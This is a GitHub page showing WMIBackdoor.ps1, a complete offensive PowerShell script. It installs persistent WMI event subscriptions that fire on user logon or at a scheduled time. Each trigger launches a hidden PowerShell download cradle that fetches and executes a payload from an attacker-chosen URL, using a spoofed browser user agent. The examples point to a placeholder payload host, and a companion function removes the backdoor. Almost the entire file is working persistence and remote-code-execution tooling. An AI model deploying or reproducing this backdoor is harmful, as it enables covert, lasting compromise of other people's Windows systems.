forked from xorrior/RandomPS-Scripts
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathWMIBackdoor.ps1
242 lines (175 loc) · 7.33 KB
/
WMIBackdoor.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
<#
.SYNOPSIS
This script contains two function that will create or remove a backdoor using WMI event subscriptions. These functions can only be used as an administrator.
.DESCRIPTION
This script contains two functions that will create or remove a backdoor using WMI event subscriptions. Currently there are only two triggers that can be used.
The first triggers an event once an interactive or cached interactive session has been established. A username can be utilized to create a more specific trigger.
The second will trigger once a specific time has been met and will also trigger every subsequent hour afterwards. When an event is triggered, a powershell download cradle will connect to the URL specified.
.PARAMETER URL
The URL for the powershell download cradle.
.PARAMETER FilterName
The name to use for the Event Filter and Consumer. Make note of this name, it will be used to remove the backdoor!
.PARAMETER Interval
Interval to be used for how often to send notifications for events. In seconds. Avoid using small intervals.
.SWITCH UserTrigger
Use the logon event filter
.SWITCH TimeTrigger
Use the time event filter
.PARAMETER Time
Specificy time to trigger an event when using the time event filter. In 24 HR format.
.EXAMPLE
Set an interactive logon event filter that when triggered, will launch a download cradle every 400 seconds.
Set-WMIBackdoor -URL "http://www.posh.com/Ps1Payload" -Name "PWN" -Interval 400 -UserTrigger
.EXAMPLE
Set a time event filter for everyday at 10:30 AM and every subsequent hour afterwards, everyday.
Set-WMIBackdoor -URL "http://www.posh.com/Ps1Payload" -Name "PWN" -TimeTrigger -Time "10:30"
.EXAMPLE
Remove the Consumer, Filter, and Binding with the name "PWN"
Remove-WMIBackdoor PWN
#>
Function Set-WMIBackdoor
{
[CmdletBinding()]
param(
[Parameter(Mandatory=$True,Position= 0)]
[string]$URL,
[Parameter(Mandatory=$True,Position= 1)]
[string]$Name,
[Parameter(Mandatory=$True,Position= 2, ParameterSetName= "User")]
[int]$Interval=500,
[Parameter(Mandatory=$False, ParameterSetName= "User")]
[switch]$UserTrigger,
[Parameter(Mandatory=$False, ParameterSetName= "User")]
[string]$UserName,
[Parameter(Mandatory=$False, ParameterSetName="Time")]
[switch]$TimeTrigger,
[Parameter(Mandatory=$True, ParameterSetName="Time")]
[string]$Time="10:30"
)
#Build the Query
if($PsCmdlet.ParameterSetName -eq "User")
{
if($UserName)
{
$SID= $(Get-WmiObject -Class "Win32_UserAccount" -Filter "Name='$($UserName)'").SID
if(!($SID))
{
Throw "Unable obtain SID for the specified user: $UserName"
}
}
if($SID)
{
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN $interval
WHERE (TargetInstance ISA 'Win32_UserProfile')
and (TargetInstance.Loaded <> PreviousInstance.Loaded)
and (TargetInstance.SID = '$SID')
and (TargetInstance.Loaded = TRUE)"
}
else
{
$Query = "SELECT * FROM __InstanceCreationEvent WITHIN $Interval
WHERE TargetInstance ISA 'Win32_LogonSession'
AND (TargetInstance.LogonType = 2
OR TargetInstance.LogonType = 11)"
}
}
elseif($PsCmdlet.ParameterSetName -eq "Time")
{
$Hour = $time.Split(":")[0]
$Min = $time.Split(":")[-1]
$Query = "SELECT * FROM __InstanceModificationEvent WHERE
TargetInstance ISA 'Win32_LocalTime'
and ( TargetInstance.Hour >= $Hour and TargetInstance.Minute = $Min and TargetInstance.Second = 0)"
}
#Build the filter
$NS = "root\subscription"
$FilterArgs = @{
Name=$Name
EventNameSpace="root\cimv2"
QueryLanguage="WQL"
Query=$Query
}
$Filter = Set-WmiInstance -Namespace $NS -Class "__EventFilter" -Arguments $FilterArgs
#Build the Consumer
$ConsumerName = $Name
$command = "`$wc = New-Object System.Net.Webclient; `$wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) Like Gecko'); `$wc.proxy = [System.Net.WebRequest]::DefaultWebProxy; `$wc.proxy.credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; IEX (`$wc.DownloadString('$URL'))"
#$encCommand = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($command))
$commandLine = "C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -NoP -NonI -w hidden -Command $command"
$ConsumerArgs = @{
Name=$ConsumerName
CommandLineTemplate=$commandLine
}
$consumer = Set-WmiInstance -Class "CommandLineEventConsumer" -Namespace $NS -Arguments $ConsumerArgs
#Bind filter and consumer
$Args = @{
Filter = $Filter
Consumer = $consumer
}
Set-WmiInstance -Class "__FilterToConsumerBinding" -Namespace "root\subscription" -Arguments $Args
Get-WmiObject -Namespace $NS -Class "CommandLineEventConsumer" | Where-Object {$_.Name -eq $Name}
}
Function Remove-WmiBackdoor
{
<#
#>
[CmdletBinding()]
param(
[Parameter(Mandatory=$True, Position = 0)]
[string]$FilterName
)
$ns = "root\subscription"
$Binding = "__FilterToConsumerBinding"
$Filter = "__EventFilter"
$Consumer = "CommandLineEventConsumer"
#Remove the binding first
if(Get-WmiObject -Namespace $ns -Class $Binding | Where-Object {$_.Consumer -like "*$FilterName*"})
{
try
{
Get-WmiObject -Namespace $ns -Class $Binding | Where-Object {$_.Consumer -like "*$FilterName*"} | Remove-WmiObject
Write-Host "Binding has been removed"
}
catch
{
Write-Warning "Unable to remove FilterToConsumberBinding with the name: $FilterName"
}
}
else
{
Write-Warning "Unable to find FilterToConsumberBinding with the name: $FilterName"
}
#Remove the filter
if(Get-WmiObject -Namespace $ns -Class $Filter | Where-Object {$_.Name -eq "$FilterName"})
{
try
{
Get-WmiObject -Namespace $ns -Class $Filter | Where-Object {$_.Name -eq "$FilterName"} | Remove-WmiObject
Write-Host "Filter has been removed"
}
catch
{
Write-Warning "Unable to remove Event Filter with the Name: $FilterName"
}
}
else
{
Write-Warning "Unable to find Event Filter with the name: $FilterName"
}
#Remove the Consumer
if(Get-WmiObject -Namespace $ns -Class $Consumer | Where-Object {$_.Name -eq "$FilterName"})
{
try
{
Get-WmiObject -Namespace $ns -Class $Consumer | Where-Object {$_.Name -eq "$FilterName"} | Remove-WmiObject
Write-Host "Consumer has been removed"
}
catch
{
Write-Warning "Unable to remove Consumer with the Name: $FilterName"
}
}
else
{
Write-Warning "Unable to find Consumer with the name: $FilterName"
}
}